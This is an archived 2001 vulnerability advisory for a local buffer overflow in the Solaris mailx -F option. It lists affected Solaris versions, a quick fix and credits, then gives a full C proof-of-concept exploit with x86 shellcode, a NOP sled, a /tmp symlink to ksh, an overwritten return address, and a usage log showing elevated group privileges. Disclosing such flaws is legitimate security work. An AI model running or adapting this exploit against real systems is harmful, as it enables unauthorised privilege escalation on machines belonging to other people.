Vulnerability in Solaris mailx(1) Date Published: April 11, 2001 Advisory ID: N/A Bugtraq ID: N/A CVE CAN: Non currently assigned. Title: Solaris mailx(1) Buffer Overflow Vulnerability Class: Boundary Error Condition Remotely Exploitable: No Locally Exploitable: Yes Vulnerability Description: The mailx program is installed setgid mail by default in Solaris, a buffer overrun exists in the -F option, by specifying a long buffer containing machine executable code, it is possible to execute arbitrary command as gid mail. Vulnerable Packages/Systems: Solaris 8 SPARC Solaris 8 x86 Solaris 7 SPARC Solaris 7 x86 Solaris 2.6 SPARC Solaris 2.6 x86 Solaris 2.5.1 SPARC Solaris 2.5.1 x86 Solaris 2.5 SPARC Solaris 2.5 x86 Quick Fix: Clear the sgid bit of /usr/bin/mailx program. Solution/Vendor : Sun Microsystems was notified on April 18, 2001. Patches are excepted shortly. Vendor notified on: April 18, 2001 Credits: This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina. This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelpat_private Technical Description - Exploit/Concept Code: #include <fcntl.h> /* /usr/bin/mailx overflow proof of conecpt. Pablo Sor, Buenos Aires, Argentina 04/2001 psorat_private, psorat_private works against x86 solaris 8 default offset should work. usage: bash$ id uid=100(laika) gid=1(other) bash$ ./mailx-exp Subject: tomy . EOT [wait...] $ id uid=100(laika) gid=1(other) egid=6(mail) */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av) { char shell[]= "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06" "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90" "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0" "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33" "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec" "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89" "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50" "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2" "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4" "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78"; unsigned long magic = get_esp() + 2075; /* default offset */ unsigned char buf[1150]; char *envi; envi = (char *)malloc(300*sizeof(char)); memset(envi,0x90,300); memcpy(envi+280-strlen(shell),shell,strlen(shell)); memcpy(envi,"SOR=",4); envi[299]=0; putenv(envi); symlink("/bin/ksh","/tmp/xx"); memset(buf,0x41,1150); memcpy(buf+1116,&magic,4); buf[1149]=0; execl("/usr/bin/mailx","mailx","-F",buf,NULL); } -- Pablo Sor psorat_private, psorat_private
This archive was generated by hypermail 2b30 : Wed May 02 2001 - 19:32:40 PDT